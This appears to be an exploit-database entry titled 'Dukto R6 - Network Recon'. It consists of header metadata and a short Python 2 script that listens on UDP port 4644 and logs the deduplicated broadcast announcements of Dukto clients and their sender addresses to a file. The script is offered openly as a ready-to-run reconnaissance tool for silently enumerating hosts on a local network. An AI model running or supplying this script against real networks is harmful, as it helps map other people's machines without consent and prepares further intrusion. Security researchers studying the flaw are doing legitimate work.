# Title: Dukto R6 - Network Recon
# Exploit Author: Ibtihaj
# Vendor Homepage:http://www.msec.it/blog/
# Software Link: http://www.msec.it/blog/?page_id=11
# Version: R6
# Tested on: Windows vista,7,8,8.1,10|Ubuntu 16.04,18.04|macOS 10.13
# Original Research By: Nicolas SURRIBAS (http://devloop.users.sourceforge.net/index.php?article121/dukto-recherche-de-vulnerabilites-et-exploitation)


####################################################################################################################################################

import socket

UDP_IP = "0.0.0.0"
UDP_PORT = 4644

sock = socket.socket(socket.AF_INET, # Internet
                 socket.SOCK_DGRAM) # UDP
sock.bind((UDP_IP, UDP_PORT))
f= open("d.txt","a+")
f.close();
while True:
    data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes
    tw = str(data) + " --- " + str(addr)
    with open('d.txt',"r") as myfile:
     if tw in myfile.read():
         print("Dup :)")#skipping the duplicate info
	 myfile.close()
     else:
         print tw
   	 hs = open("d.txt","a+")
    	 hs.write(tw+"\n")
    	 hs.close()

